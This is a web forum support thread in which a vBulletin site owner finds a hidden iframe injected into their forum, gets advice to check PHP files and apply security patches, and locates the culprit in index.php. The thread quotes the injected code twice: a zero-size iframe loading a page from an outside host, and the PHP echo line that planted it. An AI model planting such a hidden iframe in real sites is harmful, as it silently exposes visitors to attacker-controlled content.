I don't know what happened, but I think some hacker has put some iFrame on top of my website. :mad: :(

<iframe src="http://ferrerautoparts.com/ini.php" width="0" height="0" frameborder="0"></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" dir="ltr" lang="en" id="vbulletin_html"> <head> <link rel="canonical" href="http://yopakistan.com/forum.php" />

I tried to search it from phpmyadmin, found some files, change and removed the code, but still its there. I have checked the templates but I can't find it there. What should I do?

You can check my website: http://www.yopakistan.com/forum.php and view its source and see the top most line.

Sorry to hear about your troubles. :(

First you need to follow our advisory about deleting the install folder off your forums.

Then please read the following two blog posts:
http://www.vbulletin.com/forum/blogs...ve-been-hacked (http://www.vbulletin.com/forum/blogs/zachery/3993888-fixing-your-site-after-you-have-been-hacked)

http://www.vbulletin.com/forum/blogs...vbulletin-site (http://www.vbulletin.com/forum/blogs/zachery/3993849-best-practices-for-securing-your-vbulletin-site)

Also please see these recent security announcements:

vBulletin 4.1.x-4.2.x & All versions of vBulletin 5: http://www.vbulletin.com/forum/forum...-1-vbulletin-5 (http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5)
vBulletin 5.0.x patch released, for a different security issue: http://www.vbulletin.com/forum/forum...d-all-versions (http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3993204-vbulletin-5-connect-security-patches-released-all-versions)

Given the location of the iframe at the very top of the page, before the html output, I would look for the malicious code inside the php files, not the templates or plugins.

when I open the domain like yopakistan.com it also gives me error:

Unable to add cookies, header already sent.
File: /home/yopancom/public_html/index.php
Line: 42

or search for iframe in your templates if nothing found

@Cellarious: I found the issue in the Index.php file.

if (defined('VB_RELATIVE_PATH'))

{

chdir('./' . VB_RELATIVE_PATH);

}

echo '<iframe src="http://ferrerautoparts.com/ini.php" width="0" height="0" frameborder="0"></iframe>';

require('forum.php');

I will re-install the forum so that there should be a clean installation. I wonder this will clear the Header Already Sent error as well.
Thank you so much for helping :)

I see that the issue you were suffering has gone!!!

great to know

I wonder this will clear the Header Already Sent error as well.
Yes it should. I would be curious to know if you see any trace of this in the admincp logs. Normally to modify a file you would have to go through your server but you could do it with a temporary plugin using filesystem functions.